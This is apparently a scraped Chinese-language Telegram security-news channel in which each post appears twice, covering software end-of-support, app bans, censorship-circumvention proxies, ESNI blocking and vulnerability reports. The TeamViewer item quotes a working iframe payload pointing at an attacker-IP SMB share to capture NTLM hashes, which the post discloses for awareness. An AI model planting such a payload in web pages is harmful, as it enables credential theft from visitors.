Office 2010于2020年10月后停止支持的对策
Office软件是微软公司出品的一套包含Word等组件的办公软件,有2003、2007、2010、2013、2016、2019、365等不同的版本。其中,Office 2003和2007早已经停止提供补丁更新,2020年10月之后,微软公司也不再继续提供Office2010的安全补丁,上网的电脑系统中装有Office 2010(以及Office 2007或2003)软件、或不是本教程推荐的office版本(office2016、2019、365,其它版本的office2013),存在一定的安全风险,请大家卸载掉。
如果是在始终不联网(物理断网,或禁用网卡)的系统(含虚拟机系统)中使用Office软件的,这样的系统中已安装的Office软件可以不卸载。
#微软 #Windows
信息安全技术频道🔎
@tg_InternetSecurity
Office软件是微软公司出品的一套包含Word等组件的办公软件,有2003、2007、2010、2013、2016、2019、365等不同的版本。其中,Office 2003和2007早已经停止提供补丁更新,2020年10月之后,微软公司也不再继续提供Office2010的安全补丁,上网的电脑系统中装有Office 2010(以及Office 2007或2003)软件、或不是本教程推荐的office版本(office2016、2019、365,其它版本的office2013),存在一定的安全风险,请大家卸载掉。
如果是在始终不联网(物理断网,或禁用网卡)的系统(含虚拟机系统)中使用Office软件的,这样的系统中已安装的Office软件可以不卸载。
#微软 #Windows
信息安全技术频道🔎
@tg_InternetSecurity
日本也考虑禁止 TikTok 等中国应用
在印度和美国之后,日本政府也考虑禁止 TikTok 等中国应用。日本自民党“规则形成战略议员联盟”基本决定,将向政府建议限制使用中国企业推出的 APP。这是担心收集到的个人信息流向中国政府并被利用而采取的应对。会长甘利明表示:“信息如何被收集和利用,已经进入了必须从不同于以往的广阔视角看待信息相关器材和信息软件的时代。”他还解释称这是基于美国要求的应对。建议拟要求在《电气通信事业法》等基础设施相关法令中加入对安全保障方面担忧的顾及。此举或是顺应高科技领域和供应链(零部件的采购及供应网)的美中经济脱钩动向。
#抖音 #日本 #中国
信息安全技术频道🔎
@tg_InternetSecurity
在印度和美国之后,日本政府也考虑禁止 TikTok 等中国应用。日本自民党“规则形成战略议员联盟”基本决定,将向政府建议限制使用中国企业推出的 APP。这是担心收集到的个人信息流向中国政府并被利用而采取的应对。会长甘利明表示:“信息如何被收集和利用,已经进入了必须从不同于以往的广阔视角看待信息相关器材和信息软件的时代。”他还解释称这是基于美国要求的应对。建议拟要求在《电气通信事业法》等基础设施相关法令中加入对安全保障方面担忧的顾及。此举或是顺应高科技领域和供应链(零部件的采购及供应网)的美中经济脱钩动向。
#抖音 #日本 #中国
信息安全技术频道🔎
@tg_InternetSecurity
Google Chrome_v84.0.4147.105_美博纯净绿色版
Chrome浏览器以速度和安全著称,美博翻墙纯净绿色版根据最新的稳定版制作的绿色纯净版本,目的是打造一个安全可靠的绿色版浏览器,重点放在安全、实用、干净、快速方便,進行了必要的安全设置,增强安全性,增加必要的扩展,方便网友翻墙时设置代理等;本绿色版适合于安全翻墙和安全性要求高的朋友使用,当然也适合其他朋友作为常用的浏览器。
特别说明:
有网友反映,chrome浏览器扩展会不显示。据说这是chrome增加的保护机制所致。如何唤醒扩展?
打开浏览器后,在书签栏有一个【*已安装扩展】的书签夹,里面有本浏览器中已经安装扩展的“Chrome 网上应用店”的下载链接,请“重新”安装一遍扩展。安装后不需要重新设置,美博对扩展已经做好的设置,如代理等等,已经在浏览器中保存,重新安装一遍扩展后这些设置会自动唤起生效。
下载链接
MD5: 32C4DAC0DED4598426FC33CEFD885872
SHA1: F53B32F0352B1B30A33A070A47D25DB12B312412
#美博园 #Chrome
信息安全技术频道🔎
@tg_InternetSecurity
Chrome浏览器以速度和安全著称,美博翻墙纯净绿色版根据最新的稳定版制作的绿色纯净版本,目的是打造一个安全可靠的绿色版浏览器,重点放在安全、实用、干净、快速方便,進行了必要的安全设置,增强安全性,增加必要的扩展,方便网友翻墙时设置代理等;本绿色版适合于安全翻墙和安全性要求高的朋友使用,当然也适合其他朋友作为常用的浏览器。
特别说明:
有网友反映,chrome浏览器扩展会不显示。据说这是chrome增加的保护机制所致。如何唤醒扩展?
打开浏览器后,在书签栏有一个【*已安装扩展】的书签夹,里面有本浏览器中已经安装扩展的“Chrome 网上应用店”的下载链接,请“重新”安装一遍扩展。安装后不需要重新设置,美博对扩展已经做好的设置,如代理等等,已经在浏览器中保存,重新安装一遍扩展后这些设置会自动唤起生效。
下载链接
MD5: 32C4DAC0DED4598426FC33CEFD885872
SHA1: F53B32F0352B1B30A33A070A47D25DB12B312412
#美博园 #Chrome
信息安全技术频道🔎
@tg_InternetSecurity
谷歌镜像代理网站
https://guge9.978789.xyz/
https://vvp0.499994.xyz/googlebak.html
https://gg.i-research.edu.eu.org/
https://gogoo.ml/
https://g.wangcb.com/
https://go.judd.workers.dev/
https://g.menss.me/
https://so.niostack.com/
https://goo.gle.workers.dev/
https://shy-dew-5123.uuccaassjjtt.workers.dev/
http://www.fcczp.com
https://googlehnzyc.azurewebsites.net/
https://readmorejoy.com/search/
https://metager.de
https://search.mysearch.com/
https://www.yippy.com
https://www.discretesearch.com
https://busca.uol.com.br
https://peekier.com
https://goobe.io
https://fireball.com
https://www.enow.com
https://www.aolsearch.com
https://www.startpage.com/
https://mengso.com/
谷歌学术
https://xue.glgoo.org/
https://f.glgoo.top/
https://scholar.glgoo.org/
https://xues.glgoo.com/
https://xs.glgoo.top/scholar/
如果镜像都失效了可以看
https://go.zerousd.com/a-proxy-website
#Google #代理 #翻墙
信息安全技术频道🔎
@tg_InternetSecurity
https://guge9.978789.xyz/
https://vvp0.499994.xyz/googlebak.html
https://gg.i-research.edu.eu.org/
https://gogoo.ml/
https://g.wangcb.com/
https://go.judd.workers.dev/
https://g.menss.me/
https://so.niostack.com/
https://goo.gle.workers.dev/
https://shy-dew-5123.uuccaassjjtt.workers.dev/
http://www.fcczp.com
https://googlehnzyc.azurewebsites.net/
https://readmorejoy.com/search/
https://metager.de
https://search.mysearch.com/
https://www.yippy.com
https://www.discretesearch.com
https://busca.uol.com.br
https://peekier.com
https://goobe.io
https://fireball.com
https://www.enow.com
https://www.aolsearch.com
https://www.startpage.com/
https://mengso.com/
谷歌学术
https://xue.glgoo.org/
https://f.glgoo.top/
https://scholar.glgoo.org/
https://xues.glgoo.com/
https://xs.glgoo.top/scholar/
如果镜像都失效了可以看
https://go.zerousd.com/a-proxy-website
#Google #代理 #翻墙
信息安全技术频道🔎
@tg_InternetSecurity
你最喜欢用的翻墙代理是?
Anonymous Poll
35%
SS/SSR
49%
v2ray/trojan
2%
Lantern/psiphon
19%
clash
8%
自由门/无界浏览
12%
Tor/I2P
13%
tg代理
8%
其他在评论区留言
This media is not supported in your browser
VIEW IN TELEGRAM
中共用恶意软件Taidoor发动网络攻击
美国国土安全部、联邦调查局和国防部,周一发出警告,中共利用一种活跃了10多年的恶意软件,发动网络攻击。
国土安全部下属的“网络安全和基础设施安全局”、联邦调查局,以及国防部发布联合报告,中国政府使用了一种名叫“泰门”的恶意软件变种。最新发现的是“泰门”X86和X64版本。
“泰门”作为服务动态链接库,被安装在攻击目标系统上。它通常包含两个文件,第一个文件是下载器,负责解压第二个文件,并在内存中运行恶意软件。
“网络安全和基础设施安全局”周一发推文表示,中国从2008年开始,就利用“泰门”破坏网络系统。
联邦调查局周一也推文说:“联邦调查局怀疑中共政府网络使用者,利用“泰门”寄存在受害者的网络上。”
联邦调查局确信,中共政府将恶意软件变种,与代理服务器相结合,安装在受害者系统上,进行进一步网络操作。
“网络安全和基础设施安全局”表示,今年5月13日,该安全局和联邦调查局联合发布报告,警告研究新冠病毒的机构,可能遭到来自中方的网络攻击。
报告指出,研究新冠病毒的医疗、制药和研究部门,是中共的首要攻击目标。
报告还说,中共对这些部门的攻击,给美国应对疫情带来巨大威胁。
#中共 #美国 #恶意软件 #网络攻击 #新冠肺炎
信息安全技术频道🔎
@tg_InternetSecurity
美国国土安全部、联邦调查局和国防部,周一发出警告,中共利用一种活跃了10多年的恶意软件,发动网络攻击。
国土安全部下属的“网络安全和基础设施安全局”、联邦调查局,以及国防部发布联合报告,中国政府使用了一种名叫“泰门”的恶意软件变种。最新发现的是“泰门”X86和X64版本。
“泰门”作为服务动态链接库,被安装在攻击目标系统上。它通常包含两个文件,第一个文件是下载器,负责解压第二个文件,并在内存中运行恶意软件。
“网络安全和基础设施安全局”周一发推文表示,中国从2008年开始,就利用“泰门”破坏网络系统。
联邦调查局周一也推文说:“联邦调查局怀疑中共政府网络使用者,利用“泰门”寄存在受害者的网络上。”
联邦调查局确信,中共政府将恶意软件变种,与代理服务器相结合,安装在受害者系统上,进行进一步网络操作。
“网络安全和基础设施安全局”表示,今年5月13日,该安全局和联邦调查局联合发布报告,警告研究新冠病毒的机构,可能遭到来自中方的网络攻击。
报告指出,研究新冠病毒的医疗、制药和研究部门,是中共的首要攻击目标。
报告还说,中共对这些部门的攻击,给美国应对疫情带来巨大威胁。
#中共 #美国 #恶意软件 #网络攻击 #新冠肺炎
信息安全技术频道🔎
@tg_InternetSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
美国推出干净网络全面对抗中共
周二,美国国务卿蓬佩奥宣布实施专门针对中共制订的“干净网络”政策,目的是彻底终结中共利用通讯和互联网行业对美国的侵害。
今年4月,蓬佩奥宣布了美国的“干净路径”政策,禁止使用任何由华为、中兴等受中共控制的电信公司所提供设备和服务。
而国务院周三宣布的政策是对“干净路径”政策的重大升级和扩展,增加了“干净运营商”、“干净软件”、“干净应用商店”、“干净云端”和“干净电缆”5大领域。
根据新政策,美国将拒绝中共电信运营商,在未来为美国与其它国家间的国际电信提供服务,同时责成联邦电信委员会(FCC),终止中国电信等3家中共企业正在美国提供的电信服务。
美国的应用软件商店也将清理所有不被信任的中国应用程序。
同时,美国政府还将禁止华为等中国供应商,预装或提供下载美国应用程序,避免美国企业成为华为和中共侵犯人权的帮凶。
此外,川普政府还将限制中国的云服务提供商在美国收集、存储和处理大数据及敏感信息的能力。
而“干净电缆”政策,将确保中共无法从美国和其它国家连入全球互联网的海底电缆中窃取信息。
国务院周三推出“干净网络”政策,是美国近期一系列抵制中共侵略行为的最新措施,旨在彻底断绝中共利用互联网和通讯行业对美国进行侵犯。
#美国 #中共 #信息安全 #干净网络
信息安全技术频道🔎
@tg_InternetSecurity
周二,美国国务卿蓬佩奥宣布实施专门针对中共制订的“干净网络”政策,目的是彻底终结中共利用通讯和互联网行业对美国的侵害。
今年4月,蓬佩奥宣布了美国的“干净路径”政策,禁止使用任何由华为、中兴等受中共控制的电信公司所提供设备和服务。
而国务院周三宣布的政策是对“干净路径”政策的重大升级和扩展,增加了“干净运营商”、“干净软件”、“干净应用商店”、“干净云端”和“干净电缆”5大领域。
根据新政策,美国将拒绝中共电信运营商,在未来为美国与其它国家间的国际电信提供服务,同时责成联邦电信委员会(FCC),终止中国电信等3家中共企业正在美国提供的电信服务。
美国的应用软件商店也将清理所有不被信任的中国应用程序。
同时,美国政府还将禁止华为等中国供应商,预装或提供下载美国应用程序,避免美国企业成为华为和中共侵犯人权的帮凶。
此外,川普政府还将限制中国的云服务提供商在美国收集、存储和处理大数据及敏感信息的能力。
而“干净电缆”政策,将确保中共无法从美国和其它国家连入全球互联网的海底电缆中窃取信息。
国务院周三推出“干净网络”政策,是美国近期一系列抵制中共侵略行为的最新措施,旨在彻底断绝中共利用互联网和通讯行业对美国进行侵犯。
#美国 #中共 #信息安全 #干净网络
信息安全技术频道🔎
@tg_InternetSecurity
川普签行政令:45天后禁美企与TikTok、微信交易
美国总统特朗普6日签署2项行政命令,将在45天后禁止美国任何个人或企业与TikTok及其母公司字节跳动、WeChat及其母公司腾讯进行交易。川普表示,此举是为了保护美国人的隐私和国家安全。目前,美国国土安全部、运输安全管理局和美国武装部队已经禁止在政府手机上使用TikTok。
川普宣布在命令公布45天后,将禁止所有美国民众及企业和TikTok的中国母公司字节跳动进行任何交易,任何违反这项命令的个人或企业都可能面临制裁。
另一项行政命令是针对微信,同样将在命令公布45天后,禁止所有美国民众及企业与微信的母公司腾讯进行任何交易。川普政府一直警告,微信会自动从用户那里获取大量信息,被中共政府使用。
美国国务卿蓬佩奥表示,“由于母公司设在中国,Tiktok和微信等应用对美国公民的个人数据构成了重大威胁,更不用说中国共产党的内容审查工具了”。
美国政府正在采取行动把这些中国的应用程式从美国移动应用商店清除出去,以确保美国人的隐私和商业信息不被中共政府盗取。
#美国 #中共 #抖音 #微信
信息安全技术频道🔎
@tg_InternetSecurity
美国总统特朗普6日签署2项行政命令,将在45天后禁止美国任何个人或企业与TikTok及其母公司字节跳动、WeChat及其母公司腾讯进行交易。川普表示,此举是为了保护美国人的隐私和国家安全。目前,美国国土安全部、运输安全管理局和美国武装部队已经禁止在政府手机上使用TikTok。
川普宣布在命令公布45天后,将禁止所有美国民众及企业和TikTok的中国母公司字节跳动进行任何交易,任何违反这项命令的个人或企业都可能面临制裁。
另一项行政命令是针对微信,同样将在命令公布45天后,禁止所有美国民众及企业与微信的母公司腾讯进行任何交易。川普政府一直警告,微信会自动从用户那里获取大量信息,被中共政府使用。
美国国务卿蓬佩奥表示,“由于母公司设在中国,Tiktok和微信等应用对美国公民的个人数据构成了重大威胁,更不用说中国共产党的内容审查工具了”。
美国政府正在采取行动把这些中国的应用程式从美国移动应用商店清除出去,以确保美国人的隐私和商业信息不被中共政府盗取。
#美国 #中共 #抖音 #微信
信息安全技术频道🔎
@tg_InternetSecurity
新发现一种通过蓝牙入侵Android手机的方法
据周三在2020年黑帽大会上发表的最新DBAPPSecurity研究显示,想要从Android设备中窃取联系人,通话记录和SMS验证码等敏感信息的攻击者只需针对蓝牙协议即可。
研究人员发现,这些漏洞利用了零日漏洞,其中之一还可以使黑客在操纵不当的情况下发送假短信。
它的工作原理是,允许攻击者伪装成可信任的应用程序,并请求允许一个支持蓝牙的设备与另一个设备(如耳机或汽车的“信息娱乐”系统)共享数据的权限。为了使攻击成功进行,必须在目标设备上启用蓝牙,并且受害者必须批准攻击者的特权请求。最后,这家行动公司使攻击者能够访问受害者设备上的数据。
另一种攻击使研究人员可以利用称为“ BlueRepli”的身份验证绕过漏洞。潜在的攻击者可以通过模仿以前与目标连接的设备来绕过身份验证。受害者无需授予设备权限即可利用该漏洞利用程序。
谷歌发言人:“我们已经意识到了这个问题,目前正在与我们的合作伙伴一起开发解决方案。”
研究人员称,该漏洞不会影响iPhone。
蓝牙长期以来一直受漏洞困扰,其中包括那些可能使附近的黑客在受害设备上执行代码的漏洞。
美国国家安全局本周早些时候警告说,即使避免关闭GPS或位置服务,想要避免从手机中暴露敏感位置数据的用户也应注意,移动设备会使用WiFi或蓝牙来计算位置。
#黑客 #Android #个人隐私 #入侵 #蓝牙
信息安全技术频道🔎
@tg_InternetSecurity
据周三在2020年黑帽大会上发表的最新DBAPPSecurity研究显示,想要从Android设备中窃取联系人,通话记录和SMS验证码等敏感信息的攻击者只需针对蓝牙协议即可。
研究人员发现,这些漏洞利用了零日漏洞,其中之一还可以使黑客在操纵不当的情况下发送假短信。
它的工作原理是,允许攻击者伪装成可信任的应用程序,并请求允许一个支持蓝牙的设备与另一个设备(如耳机或汽车的“信息娱乐”系统)共享数据的权限。为了使攻击成功进行,必须在目标设备上启用蓝牙,并且受害者必须批准攻击者的特权请求。最后,这家行动公司使攻击者能够访问受害者设备上的数据。
另一种攻击使研究人员可以利用称为“ BlueRepli”的身份验证绕过漏洞。潜在的攻击者可以通过模仿以前与目标连接的设备来绕过身份验证。受害者无需授予设备权限即可利用该漏洞利用程序。
谷歌发言人:“我们已经意识到了这个问题,目前正在与我们的合作伙伴一起开发解决方案。”
研究人员称,该漏洞不会影响iPhone。
蓝牙长期以来一直受漏洞困扰,其中包括那些可能使附近的黑客在受害设备上执行代码的漏洞。
美国国家安全局本周早些时候警告说,即使避免关闭GPS或位置服务,想要避免从手机中暴露敏感位置数据的用户也应注意,移动设备会使用WiFi或蓝牙来计算位置。
#黑客 #Android #个人隐私 #入侵 #蓝牙
信息安全技术频道🔎
@tg_InternetSecurity
TeamViewer漏洞可能被利用来破解用户密码
Windows的TeamViewer中的高风险漏洞(CVE-2020-13699)可能被远程攻击者利用来破解用户的密码,从而导致进一步的系统利用。
TeamViewer是由德国公司TeamViewer GmbH开发的应用程序,它主要用于远程访问和控制各种类型的计算机系统和移动设备,还提供协作和演示功能。
CVE-2020-13699是安全漏洞,由未引用搜索路径或元素引起–更具体地说,这是由于应用程序未正确引用其自定义URI处理程序而引起的-当安装了TeamViewer漏洞版本的系统访问恶意制作的网站。
“攻击者可以使用精心制作的URL(iframe src ='teamviewer10:--play \\ attacker-IP \ share \ fake.tvs')将恶意iframe嵌入网站中,这将启动TeamViewer Windows桌面客户端并强制其执行以下操作:打开远程SMB共享。” Praetorian的安全工程师Jeffrey Hofmann解释说,他发现并负责地披露了该漏洞。
“ Windows在打开SMB共享时将执行NTLM身份验证,并且可以(使用诸如响应程序之类的工具)中继该请求以执行代码(或捕获该请求以进行哈希破解)。”
据该公司称,该漏洞影响Windows平台的TeamViewer版本8至15(最高15.8.2)。建议用户升级到15.8.3版以消除漏洞。
#漏洞 #Windows #信息安全 #TeamViewer
信息安全技术频道🔎
@tg_InternetSecurity
Windows的TeamViewer中的高风险漏洞(CVE-2020-13699)可能被远程攻击者利用来破解用户的密码,从而导致进一步的系统利用。
TeamViewer是由德国公司TeamViewer GmbH开发的应用程序,它主要用于远程访问和控制各种类型的计算机系统和移动设备,还提供协作和演示功能。
CVE-2020-13699是安全漏洞,由未引用搜索路径或元素引起–更具体地说,这是由于应用程序未正确引用其自定义URI处理程序而引起的-当安装了TeamViewer漏洞版本的系统访问恶意制作的网站。
“攻击者可以使用精心制作的URL(iframe src ='teamviewer10:--play \\ attacker-IP \ share \ fake.tvs')将恶意iframe嵌入网站中,这将启动TeamViewer Windows桌面客户端并强制其执行以下操作:打开远程SMB共享。” Praetorian的安全工程师Jeffrey Hofmann解释说,他发现并负责地披露了该漏洞。
“ Windows在打开SMB共享时将执行NTLM身份验证,并且可以(使用诸如响应程序之类的工具)中继该请求以执行代码(或捕获该请求以进行哈希破解)。”
据该公司称,该漏洞影响Windows平台的TeamViewer版本8至15(最高15.8.2)。建议用户升级到15.8.3版以消除漏洞。
#漏洞 #Windows #信息安全 #TeamViewer
信息安全技术频道🔎
@tg_InternetSecurity
几个添加telegram群组的导航网站
1. Combot:https://combot.org/telegram/top/chats
2. tele.me :https://tele.me/
3. 中文圈群组索引:https://www.telegram.url.tw/
4. Telegram 群組/頻道/機器人 公眾索引系統:https://tg.weils.net/
5. telegramindex:https://telegramindex.com/
6. 导航机器人频道:https://t.me/TG_index_channel
7. 导航机器人:https://t.me/hao1234bot
#telegram
信息安全技术频道🔎
@tg_InternetSecurity
1. Combot:https://combot.org/telegram/top/chats
2. tele.me :https://tele.me/
3. 中文圈群组索引:https://www.telegram.url.tw/
4. Telegram 群組/頻道/機器人 公眾索引系統:https://tg.weils.net/
5. telegramindex:https://telegramindex.com/
6. 导航机器人频道:https://t.me/TG_index_channel
7. 导航机器人:https://t.me/hao1234bot
#telegram
信息安全技术频道🔎
@tg_InternetSecurity
中国防火墙开始屏蔽 ESNI
Geneva、GFW Report、iYouPort团队发现中国的防火长城(GFW)已经开始封锁ESNI(加密服务器名称指示)这一TLS1.3和HTTPS的基础特性。测试发现,防火墙通过丢弃从客户端到服务器的数据包来阻止 ESNI 连接。此外,ESNI 封锁不仅会发生在 443 端口,也会发生在 1 到 65535 的所有端口。在阻断 ESNI 握手后,防火墙会继续阻断与(源IP,目标IP,目标端口) 3 元组相关的任何连接一段时间。
服务器名称指示(英语:Server Name Indication,简称SNI)是一个扩展的TLS计算机联网协议,在该协议下,在握手过程开始时客户端告诉它正在连接的服务器要连接的主机名称。这允许服务器在相同的IP地址和TCP端口号上呈现多个TLS证书,并且因此允许在相同的IP地址上提供多个安全(HTTPS)网站(或其他任何基于TLS的服务),而不需要所有这些站点使用相同的TLS证书。它与HTTP/1.1基于名称的虚拟主机的概念相同,但是用于HTTPS。所需的主机名未加密, 因此窃听者可以查看请求的网站。
由于SNI信息并非加密的,允许审查者区分出“真实”和“虚假”的服务或者识别出用户访问的网站域名。现已被部分国家用于互联网审查。
作为TLS的标准扩展实现,TLS 1.3将通过支持加密SNI以解决这个问题。目前,Cloudflare、Mozilla、Fastly和苹果的开发者已开始制定了关于加密服务器名称指示(Encrypted Server Name Indication)的草案。
#中国 #网络审查 #防火墙 #iYouPort #ESNI
信息安全技术频道🔎
@tg_InternetSecurity
Geneva、GFW Report、iYouPort团队发现中国的防火长城(GFW)已经开始封锁ESNI(加密服务器名称指示)这一TLS1.3和HTTPS的基础特性。测试发现,防火墙通过丢弃从客户端到服务器的数据包来阻止 ESNI 连接。此外,ESNI 封锁不仅会发生在 443 端口,也会发生在 1 到 65535 的所有端口。在阻断 ESNI 握手后,防火墙会继续阻断与(源IP,目标IP,目标端口) 3 元组相关的任何连接一段时间。
服务器名称指示(英语:Server Name Indication,简称SNI)是一个扩展的TLS计算机联网协议,在该协议下,在握手过程开始时客户端告诉它正在连接的服务器要连接的主机名称。这允许服务器在相同的IP地址和TCP端口号上呈现多个TLS证书,并且因此允许在相同的IP地址上提供多个安全(HTTPS)网站(或其他任何基于TLS的服务),而不需要所有这些站点使用相同的TLS证书。它与HTTP/1.1基于名称的虚拟主机的概念相同,但是用于HTTPS。所需的主机名未加密, 因此窃听者可以查看请求的网站。
由于SNI信息并非加密的,允许审查者区分出“真实”和“虚假”的服务或者识别出用户访问的网站域名。现已被部分国家用于互联网审查。
作为TLS的标准扩展实现,TLS 1.3将通过支持加密SNI以解决这个问题。目前,Cloudflare、Mozilla、Fastly和苹果的开发者已开始制定了关于加密服务器名称指示(Encrypted Server Name Indication)的草案。
#中国 #网络审查 #防火墙 #iYouPort #ESNI
信息安全技术频道🔎
@tg_InternetSecurity